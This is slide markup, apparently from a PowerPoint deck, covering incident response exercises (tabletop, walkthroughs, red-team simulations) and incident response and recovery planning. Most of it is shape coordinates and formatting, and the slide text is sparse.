                <a:lnTo>
                  <a:pt x="424306" y="105918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474344" y="91567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525017" y="79629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576326" y="70231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="628141" y="63246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680212" y="58927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732663" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1107549" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1061974" y="43307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1007237" y="29463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="952245" y="18287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="896874" y="9779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841501" y="3810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="786002" y="635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="730630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32196" y="306451"/>
            <a:ext cx="498856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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incident</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Response</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exercises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22064" y="760476"/>
            <a:ext cx="7642859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36775" y="1634769"/>
            <a:ext cx="11981815" cy="1308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Conducting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testing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incident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 response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procedures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tools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allows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staffs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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>improve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their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skills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while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also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detecting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flaws.</a:t>
            </a:r>
            <a:endParaRPr sz="22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1390"/>
              </a:spcBef>
            </a:pP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There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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>three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types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trainings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prepare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incident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response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scenarios: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63673" y="3793997"/>
            <a:ext cx="6162040" cy="2098675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6162040" h="2098675">
                <a:moveTo>
                  <a:pt x="0" y="349757"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3192" y="302297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12493" y="256778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27485" y="213615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47751" y="173228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72876" y="136030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102441" y="102441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136030" y="72876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173228" y="47751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213615" y="27485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256778" y="12493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302297" y="3192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349757" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5811774" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5859234" y="3192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5904753" y="12493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5947916" y="27485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5988304" y="47751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6025501" y="72876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6059090" y="102441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6088655" y="136030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6113779" y="173227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6134046" y="213615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149038" y="256778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158339" y="302297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="349757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="1748789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158339" y="1796250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149038" y="1841769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6134046" y="1884932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6113780" y="1925319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6088655" y="1962517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6059090" y="1996106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6025501" y="2025671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5988304" y="2050795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5947916" y="2071062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5904753" y="2086054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5859234" y="2095355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5811774" y="2098548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349757" y="2098548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302297" y="2095355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256778" y="2086054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213615" y="2071062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173227" y="2050796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136030" y="2025671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102441" y="1996106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72876" y="1962517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47751" y="1925319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27485" y="1884932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12493" y="1841769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3192" y="1796250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1748789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349757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195322" y="4456303"/>
            <a:ext cx="433641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Facilitator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presents</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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-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scenario.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95322" y="5221351"/>
            <a:ext cx="446341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dirty="0" sz="22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does</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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not</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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involve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live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systems.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27604" y="3342132"/>
            <a:ext cx="4410710" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="984885">
                <a:moveTo>
                  <a:pt x="4246372" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372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546853" y="3639058"/>
            <a:ext cx="11709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50">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Tabletop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425433" y="3766565"/>
            <a:ext cx="6162040" cy="2125980"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6162040" h="2125979">
                <a:moveTo>
                  <a:pt x="0" y="354330"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3234" y="306246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12655" y="260129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27842" y="216402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48372" y="175485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73824" y="137802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103774" y="103774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137802" y="73824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175485" y="48372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216402" y="27842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="260129" y="12655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306246" y="3234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354330" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5807202" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5855285" y="3234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5901402" y="12655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5945129" y="27842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5986046" y="48372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023729" y="73824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6057757" y="103774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6087707" y="137802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6113159" y="175485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6133689" y="216402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148876" y="260129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158297" y="306246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="354330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="1771650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158297" y="1819733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148876" y="1865850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6133689" y="1909577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6113159" y="1950494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6087707" y="1988177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6057757" y="2022205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023729" y="2052155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5986046" y="2077607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5945129" y="2098137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5901402" y="2113324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5855285" y="2122745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5807202" y="2125980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354330" y="2125980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306246" y="2122745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="260129" y="2113324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216402" y="2098137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175485" y="2077607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137802" y="2052155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103774" y="2022205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73824" y="1988177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48372" y="1950494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27842" y="1909577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12655" y="1865850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3234" y="1819733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1771650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="354330"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="EE63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8658225" y="4586122"/>
            <a:ext cx="4953000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14100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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Responders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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>demonstrate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response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actions.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412223" y="3244595"/>
            <a:ext cx="4410710" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="984885">
                <a:moveTo>
                  <a:pt x="4246372" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372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0699750" y="3541267"/>
            <a:ext cx="18357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60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Walkthroughs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063490" y="6544818"/>
            <a:ext cx="6555105" cy="2037714"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6555105" h="2037715">
                <a:moveTo>
                  <a:pt x="0" y="339597"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3099" y="293511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12129" y="249310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26683" y="207400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46359" y="168185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70752" y="132069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99456" y="99456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132069" y="70752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168185" y="46359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207400" y="26683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249310" y="12129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293511" y="3099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339598" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6215126" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6261212" y="3099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6305413" y="12129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6347323" y="26683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6386538" y="46359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6422654" y="70752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6455267" y="99456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6483971" y="132069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6508364" y="168185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6528040" y="207400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6542594" y="249310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6551624" y="293511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6554724" y="339597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6554724" y="1697977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6551624" y="1744061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6542594" y="1788260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6528040" y="1830171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6508364" y="1869387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6483971" y="1905505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6455267" y="1938120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6422654" y="1966827"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6386538" y="1991222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6347323" y="2010900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6305413" y="2025457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6261212" y="2034487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6215126" y="2037587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339598" y="2037587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293511" y="2034487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249310" y="2025457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207400" y="2010900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168185" y="1991222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132069" y="1966827"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99456" y="1938120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70752" y="1905505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46359" y="1869387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26683" y="1830171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12129" y="1788260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3099" y="1744061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1697977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="339597"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575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5291454" y="7368031"/>
            <a:ext cx="58064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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Red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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>team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performs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a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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simulated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intrusion.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124955" y="6092952"/>
            <a:ext cx="4410710" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="984884">
                <a:moveTo>
                  <a:pt x="4246372" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164084" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372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7557643" y="6392672"/>
            <a:ext cx="154559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45">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Simulations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52720" y="306451"/>
            <a:ext cx="574675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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incident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125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Response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175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recovery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0500" y="760476"/>
            <a:ext cx="8188452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89758" y="1882292"/>
            <a:ext cx="11475720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19170" marR="5080" indent="-3507104">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Incident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response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aids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planning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risk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management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cybersecurity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resilience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planning.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This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can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achieved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by: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01139" y="4879847"/>
            <a:ext cx="744220" cy="748665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="744219" h="748664">
                <a:moveTo>
                  <a:pt x="371855" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="325213" y="2915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280299" y="11426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237461" y="25184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197049" y="43837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159411" y="67034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124896" y="94426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93851" y="125660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66627" y="160388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43571" y="198257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25031" y="238918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11357" y="282019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2897" y="327211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="374141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2897" y="421072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11357" y="466264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25031" y="509365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43571" y="550026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66627" y="587895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93851" y="622623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124896" y="653857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159411" y="681249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197049" y="704446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237461" y="723099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280299" y="736857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325213" y="745368"/>
                </a:lnTo>
